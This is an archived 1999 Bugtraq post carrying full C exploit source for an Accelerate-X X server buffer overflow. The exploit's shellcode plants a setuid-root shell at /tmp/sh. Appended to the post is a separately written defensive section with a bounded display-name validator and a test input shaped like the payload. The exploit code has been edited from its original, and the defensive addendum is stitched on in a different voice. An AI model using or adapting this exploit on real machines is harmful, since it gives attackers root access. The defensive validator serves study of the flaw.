
List:       bugtraq
Subject:    SDI exploit for Xaccel
From:       Thiago/c0nd0r <condor () SEKURE ! ORG>
Date:       1999-06-30 20:57:55

Here is the exploit for the Accelerate-X buffer overflow
discovered by the KSR[t] group (ksrt.org).

I've checked the '-query' argument and I found out that it will not
overwrite the return address, thus not allowing exploitation. The
'-indirect' argument behaves in the same way.

--- SDIaccelX.c ----
/*
 * SDI linux exploit for Accelerate-X
 * Sekure SDI - Brazilian Information Security Team
 * by c0nd0r <condor@sekure.org>
 *
 * This program will exploit a vulnerability found by the KSRT team
 * in the Accelerate-X Xserver [<=5.0].
 *
 * --------------------------------------------------------------------
 * The vulnerable buffer was small so we've changed the usual order to:
 * [garbage][eip][lots nop][shellcode]
 * BTW, I've also changed the code to execute, it will create a setuid
 * shell owned by the superuser at /tmp/sh.
 * --------------------------------------------------------------------
 *
 * Warning: DO NOT USE THIS TOOL FOR ILLICIT ACTIVITIES! We take no
 *          responsibility.
 *
 * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
 *           marty (NORDO!), vader, fcon, slide, c_orb and
 *           specially to my sasazita. Also toxyn.org, pulhas.org,
 *           superbofh.org (Phibernet rox) and el8.org.
 *
 * Laughs - lame guys who hacked the senado/planalto.gov.br
 * pay some attention to the site: securityfocus.com (good point).
 * see you at #uground (irc.brasnet.org)
 */

#include <stdio.h>
#include <stdlib.h>     /* atoi */
#include <string.h>     /* strlen */
#include <unistd.h>     /* execl */

/* generic shellcode */
char shellcode[] =
        "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
        "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
        "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
        "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
        "\x40\xcd\x80\xe8\xca\xff\xff\xff"
        "/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";

int main ( int argc, char *argv[] ) {
 char buf[1024];
 int x, y, offset=1000;
 long addr;
 int joe;

 if (argc > 1)
   offset = atoi ( argv[1]);

 /* return address: a stack address near this frame, plus the offset */
 addr = (long) &joe + offset;

 /* [garbage] */
 buf[0] = ':';
 for ( x = 1; x < 53; x++)
  buf[x] = 'X';

 /* [eip], stored little-endian */
 buf[x++] = (addr & 0x000000ff);
 buf[x++] = (addr & 0x0000ff00) >> 8;
 buf[x++] = (addr & 0x00ff0000) >> 16;
 buf[x++] = (addr & 0xff000000) >> 24;

 /* [lots nop] */
 for (  ; x < 500; x++)
  buf[x] = 0x90;

 /* [shellcode] */
 for ( y = 0; y < strlen(shellcode); y++, x++)
  buf[x] = shellcode[y];

 /* terminate at the write position; the original called strlen() on a
  * buffer that had not been terminated yet */
 buf[x] = '\0';

 fprintf (stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%lx\n\n",
          offset, addr);

 execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);

// setenv ( "EGG", buf, 1);
// system ( "/bin/sh");

 return 0;
}
----- EOF ----------


-condor
www.sekure.org
 s e k u r e

pgp key available at: http://condor.sekure.org/condor.asc
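The post's [garbage][eip][lots nop][shellcode] layout only works because the server copies its display-name argument into a fixed stack buffer without checking the length. The following is an added example, not code from the original post and not Accelerate-X's own source: it shows how that argument should be taken in, with a bounded scan, a printable-ASCII check and a syntax check for the `[host]:display[.screen]` form, so that an over-long or binary-laden argument is rejected before anything is copied. The buffer size `DISPLAY_NAME_MAX`, the function names and the display-name grammar are assumptions made for the example; the constructed sample argument only mimics the shape of the post's payload (a colon, filler, NOP bytes) and carries no address or shellcode.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the server's fixed display-name buffer.  The post's
 * payload reaches the saved return address 53 bytes into the argument, so the
 * real buffer was of that order; the exact value here is an assumption. */
#define DISPLAY_NAME_MAX 32

enum display_status {
    DISPLAY_OK = 0,
    DISPLAY_TOO_LONG,
    DISPLAY_BAD_CHAR,
    DISPLAY_BAD_SYNTAX
};

/*
 * Validate an X display name of the form [host]:display[.screen] and copy it
 * into a fixed-size buffer.  The unsafe pattern this replaces is an unbounded
 * strcpy(dst, argv[1]) into that buffer, which is what lets a long argument
 * run over the saved return address.  On any failure dst is left as an empty
 * string and nothing beyond dst[dst_size - 1] is ever written.
 */
enum display_status parse_display_name(const char *arg, char *dst, size_t dst_size)
{
    size_t len;
    const char *p, *colon;

    if (dst_size == 0)
        return DISPLAY_TOO_LONG;
    dst[0] = '\0';

    /* Bounded scan: never walk further than the space we actually have. */
    for (len = 0; len < dst_size && arg[len] != '\0'; len++)
        ;
    if (len == dst_size)
        return DISPLAY_TOO_LONG;

    /* Display names are printable ASCII only; NOP bytes (0x90) and raw
     * little-endian addresses fall outside that set. */
    for (p = arg; *p != '\0'; p++)
        if ((unsigned char)*p >= 0x80 || !isprint((unsigned char)*p))
            return DISPLAY_BAD_CHAR;

    colon = strchr(arg, ':');
    if (colon == NULL)
        return DISPLAY_BAD_SYNTAX;

    /* Optional host part: letters, digits, '-' and '.' only. */
    for (p = arg; p < colon; p++)
        if (!isalnum((unsigned char)*p) && *p != '-' && *p != '.')
            return DISPLAY_BAD_SYNTAX;

    /* Display number, then an optional ".screen" number, then nothing. */
    p = colon + 1;
    if (!isdigit((unsigned char)*p))
        return DISPLAY_BAD_SYNTAX;
    while (isdigit((unsigned char)*p))
        p++;
    if (*p == '.') {
        p++;
        if (!isdigit((unsigned char)*p))
            return DISPLAY_BAD_SYNTAX;
        while (isdigit((unsigned char)*p))
            p++;
    }
    if (*p != '\0')
        return DISPLAY_BAD_SYNTAX;

    memcpy(dst, arg, len + 1);   /* len < dst_size, so the NUL fits */
    return DISPLAY_OK;
}

/* Constructed sample shaped like the post's argument (':' + filler + NOPs),
 * used only to exercise the checks; it carries no address or shellcode. */
const char *constructed_overlong_argument(void)
{
    static char sample[80];
    memset(sample, 'X', 60);
    sample[0] = ':';
    memset(sample + 60, 0x90, 8);
    sample[68] = '\0';
    return sample;
}

/* Wrapper that parses into a module-level buffer; main() and the checks use it. */
static char last_display[DISPLAY_NAME_MAX];
enum display_status check_display(const char *arg)
{
    return parse_display_name(arg, last_display, sizeof last_display);
}

int main(int argc, char *argv[])
{
    static const char *names[] = { "ok", "too long", "bad character", "bad syntax" };
    const char *arg = argc > 1 ? argv[1] : constructed_overlong_argument();
    enum display_status st = check_display(arg);

    printf("%s -> %s\n", st == DISPLAY_OK ? last_display : "(rejected)", names[st]);
    return st == DISPLAY_OK ? 0 : 1;
}
```

Run with no argument to see the constructed over-long sample rejected as "too long"; pass `:0` or `localhost:1.0` to see a normal display name accepted. The length check runs before any byte is copied, so even a correct-looking argument one byte too long is refused rather than truncated, which is the property that takes the saved return address out of reach.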
